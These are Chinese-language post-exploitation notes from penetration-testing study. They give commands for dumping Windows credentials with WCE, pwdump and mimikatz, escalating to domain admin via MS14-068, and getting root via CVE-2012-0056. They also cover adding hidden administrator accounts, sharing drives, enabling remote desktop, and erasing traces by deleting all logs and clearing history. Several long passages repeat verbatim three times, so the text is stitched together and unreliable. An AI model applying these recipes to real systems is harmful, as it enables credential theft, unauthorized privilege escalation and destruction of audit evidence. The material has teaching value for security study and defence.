Dsniff 和 Sniffpass 只会抓密码相关的数据包
Dsniff 和 Sniffpass 只会抓密码相关的数据包
键盘记录:
Keylogger:通过该程序直接实现
木马窃取:通过一些木马程序中自带的功能实现
一、浏览器缓存密码
常见的浏览器都有“记住密码”的功能
IE浏览器
Firefox
二、网络密码
如一些域密码、邮箱密码,在本地可以查看
三、无线密码
http://www.nirsoft.net,该网站中有大量相关工具
在Kali中有相关的Windows工具:例如PwDump.exe
可以将其拷贝出来使用
*DarkComet-RAT
Windows身份认证过程:
不同的登录方式,有不同的验证响应方式
NTLM本地组包
Remote远程
域控制kerberos
kali中有WCE,,可以将其复制使用:
/usr/share/wce/
wce命令:
-l:显示已登录用户的身份信息
-v:显示具体信息
用户session、用户ID
-d luid :从登录会话删除NTLM认证信息
-e / r:列出登录会话和NTLM认证信息,刷新
-g password:生成LM 和 NT hash
-w:显示明文密码,该方法是通过内存中读取
wce与pwdump的区别:
wce从内存读取用户认证信息
Pw是从SAM文件中读取
注意:WCE读取用户的认证信息首先是通过安全模式在内存中读取,如果失败则会通过非安全模式注入代码到系统进程,这样可能会造成系统崩溃甚至是系统的损坏。
防护:修改注册表项
1、pwdump localhost
2、fgdump
3、mimikatz
能在内存中读取用户认证信息
在该程序命令行下:
::--help
有以下模块:
privilege、process、service、lsadump、ts、event、misc
Ms11-080: searchsploit
用于XP 与 2K3 ENG 的提权漏洞
Pyinstaller:其本身是一个py脚本,需要py环境
Https://pypi.python.org/pypi/Pyinstaller/2.1
用于将PY漏洞利用脚本转换为EXE
使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件
Pywin32:
Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/
Pyinstaller需要的一个软件
Ms11-046:
用于DOS攻击
Ms14-068:
在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限
库(Kali中使用脚本缺少库解决方法,下载后放到python目录)
Https://github.com/bidord/pykek
实验步骤:
1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)
2、searchsploit
3、通过脚本生成票据文件:
ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)
4、将3生成的票据拷贝到Windows中
5、在本地管理员用户(非域账户)下
mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit
然后在本地管理员用户下具有了域控制权限
注意:
步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段
步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找
Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格
kernel>=2.6.39
该漏洞文章:http://blog.zx2c4.com/749
http://old-releases.ubuntu.com/releases/11.10/
Gcc:
sudo apt-cdrom add && sudo apt-get install gcc
gcc 18411.c -o exp
本次利用漏洞:
CVE-2012-0056
步骤:
1、在kali中找到可利用漏洞的利用代码:
2、将其复制到Ubuntu(Ubuntu server)中:
3、gcc 18411.c -o exp:
生成可执行程序,运行之后就为root用户
Ms11-080: searchsploit
用于XP 与 2K3 ENG 的提权漏洞
Pyinstaller:其本身是一个py脚本,需要py环境
Https://pypi.python.org/pypi/Pyinstaller/2.1
用于将PY漏洞利用脚本转换为EXE
使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件
Pywin32:
Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/
Pyinstaller需要的一个软件
Ms11-046:
用于DOS攻击
Ms14-068:
在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限
库(Kali中使用脚本缺少库解决方法,下载后放到python目录)
Https://github.com/bidord/pykek
实验步骤:
1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)
2、searchsploit
3、通过脚本生成票据文件:
ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)
4、将3生成的票据拷贝到Windows中
5、在本地管理员用户(非域账户)下
mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit
然后在本地管理员用户下具有了域控制权限
注意:
步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段
步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找
Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格
kernel>=2.6.39
该漏洞文章:http://blog.zx2c4.com/749
http://old-releases.ubuntu.com/releases/11.10/
Gcc:
sudo apt-cdrom add && sudo apt-get install gcc
gcc 18411.c -o exp
本次利用漏洞:
CVE-2012-0056
步骤:
1、在kali中找到可利用漏洞的利用代码:
2、将其复制到Ubuntu(Ubuntu server)中:
3、gcc 18411.c -o exp:
生成可执行程序,运行之后就为root用户
服务账号需要用户登录已在后台启动服务。
针对不同的操作系统:
windows
user
administrator
system
linux
user
root
Ms11-080: searchsploit
用于XP 与 2K3 ENG 的提权漏洞
Pyinstaller:其本身是一个py脚本,需要py环境
Https://pypi.python.org/pypi/Pyinstaller/2.1
用于将PY漏洞利用脚本转换为EXE
使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件
Pywin32:
Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/
Pyinstaller需要的一个软件
Ms11-046:
用于DOS攻击
Ms14-068:
在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限
库(Kali中使用脚本缺少库解决方法,下载后放到python目录)
Https://github.com/bidord/pykek
实验步骤:
1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)
2、searchsploit
3、通过脚本生成票据文件:
ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)
4、将3生成的票据拷贝到Windows中
5、在本地管理员用户(非域账户)下
mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit
然后在本地管理员用户下具有了域控制权限
注意:
步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段
步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找
Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格
kernel>=2.6.39
该漏洞文章:http://blog.zx2c4.com/749
http://old-releases.ubuntu.com/releases/11.10/
Gcc:
sudo apt-cdrom add && sudo apt-get install gcc
gcc 18411.c -o exp
本次利用漏洞:
CVE-2012-0056
步骤:
1、在kali中找到可利用漏洞的利用代码:
2、将其复制到Ubuntu(Ubuntu server)中:
3、gcc 18411.c -o exp:
生成可执行程序,运行之后就为root用户
默认账号
windows
关系图示:
Linux
该方法在企业环境中比较常用,因为企业中往往及时更新补丁
配置不当:
1、程序以system权限启动
2、NTFS权限允许users修改删除
3、Windows下:
icacals c:\windows\*.exe /save perm /T
可以得到一个文本,文本中可以查看到逾越权限的程序
Linux下:
find / -perm 777 -exec ls -l {} \;
如:
应用连接数据库的配置文件
后台服务运行账号
Linux:
/etc/resolv.conf
/etc/passwd
/etc/shadow
whoami,who -a
ifconfig -a, iptables -L -n., netstat -nr
uname -a, ps aux
dpkg -l | head
Windows:
ipconfig /all, ipconfig /displaydns,
netstat -bnao, netstat -r
net view, net view /domain:查网络共享
net user /domain, net user %username% /domain:网络域
net accounts, net share:网络共享
net group "Domain Controllers" /domain:在域网络下,查看"Domain Controllers"的所有域用户
net localgroup administrators username /add:在管理员组中添加username账户
net share name$=C:\ /unlimited:将C盘完全共享
net user username /active:yes /domain:将暂停使用账号启用(需要域管理员权限)
Widows信息收集:
WMIC(Windows Management Instrumentation)
可以实现一下普通命令行无法实现的功能
wmic nicconfig get aipaddress, macaddress:显示IP 和MAC 地址
wmic computersystem get username:显示用户名
wmic netlogin get name, lastlogon:显示登录用户以及登录时间
wmic process get caption, executablepath, commandline:显示进程对应的程序
wmic process where name="calc.exe" call terminate:结束"calc.exe"进程
wmic os get name, servicepackmajorversion:查询主机版本以及所打的包
wmic product get name,version:查主机所安装软件和版本
wmic product where name="name" call unistall /nointeractive:无交互下删除"name"程序(悄悄地)
wmic share get /ALL:查看共享文件夹
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1":开启远程桌面,如:/node:localhost 则开启本机远程桌面
wmic ntenetlog get path, filename, writeable:查看当前系统日志对应的文件
收集敏感数据:
商业信息
系统信息
Linux:
/etc; /usr/local/etc
/etc/password; /etc/shadow
~/.ssh/; ~/.gnupg/ 公私钥
The e-mail and data files
业务数据库; 身份认证服务器数据库
~/tmp 临时数据目录中隐私泄露
Windows:
SAM数据库; 注册表文件
%SYSTEMROOT%\repair\SAM:备份版本
%SYSTEMROOT%\System32\config\RegBack\SAM:备份版本
业务数据库; 身份认证数据库
临时文件目录
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
/usr/share/windows-binaries/fgdump/
Pwdump :用来dump出操作系统保存的密码哈希
Windows:
1、禁止在登录界面显示新建账号
2、REG ADD "HKEY_LOCAL/-MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v username(需要隐藏的用户名) /T REG_DWORD /D 0
3、del %WINDIR%\*.LOG /a/s/q/f :删除windows目录下的所有日志文件
Linux:
History:历史命令行
history -c 进行清除
chattr +i .bash_history:赋予 .bash_history文件以i属性--不可写,需将文件删除,再创建一个新的文件
日志:/var/log/目录下
auth.log / secure
btmp / wtmp(以下四个文件必须通过命令显示)
lastlog / failog
其他日志和HIDS等
WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)
• wmic nicconfig get ipaddress,macaddress
//读取IP和Mac地址
• wmic computersystemget username
//查登录账号名称
• wmic netlogin get name,lastlogon
//查看用户登录记录的
• wmic process get caption, executablepath,commandline
//查看当前系统进程及其是使用什么命令运行的
• wmic process where name=“calc.exe" call terminate
//结束进程
• wmic os get name,servicepackmajorversion
//提取操作系统servicepack版本 用于判断打什么补丁
• wmic product get name,version
//查看当前机器安装的软件
• wmic product where name=“name” call uninstall /nointeractive
//删软件 /nointeractive是在后台执行
• wmic share get /ALL
//看共享文件夹
• wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections"1"
//用于开启远程服务
• wmic nteventlogget path,filename, writeable
//用于查看当前系统日志对应文件 等同于运行里的eventvwr
收集敏感数据
• 商业信息
• 系统信息
• Linux
• /etc ;/usr/local/etc
• /etc/passwd ;/etc/shadow
• .ssh ;.gnupg 公私钥
• The e-mail and data files
• 业务数据库 ;身份认证服务器数据库
• /tmp //可能找到管理员不小心留下的重要数据或是程序运行中的临时数据
• windows
• SAM 数据库 ; 注册表文件
• %SYSTEMROOT%\repair\SAM
• %SYSTEMROOT%\System32\config\RegBack\SAM • 业务数据库 ; 身份认证数据库
• 临时文件目录
• UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
本地缓存密码
浏览器缓存的密码
网络密码
win7,win8:控制面板->用户账户和家庭安全->凭据管理器
无线密码
http://www.nirsoft.net
Dump SAM
>输入Pwdump.exe localhost生成文件,使用ophcrack点击crack
>windows密码以:分为两段加密lmhash:ntmhash
windows其实不知道你输入的密码,只会保存密文格式,计算哈希值检查输入是否正确
隐藏痕迹
• 禁止在登陆界面显示新建账号
• REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0
// 不在windos登陆界面显示某账号 但是会在net user 和图形化界面看到 网上有很多别的方法藏
• del %WINDIR%\*.log /a/s/q/f //强制安静地删除所有的log文件
• History //ls -l .bash_history 在这个文件下
history -c 清除记录
lsattr 用于查看属性 chattr用于改变属性 可以改属性让文件不能被修改
• 日志
• auth.log / secure //在/var/log/下 用于存放系统登录日志和身份认证的记录
• btmp / wtmp //用last命令查看 系统账号登录信息
• lastlog / faillog
• 其他日志和 HIDS 等
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
的wdigest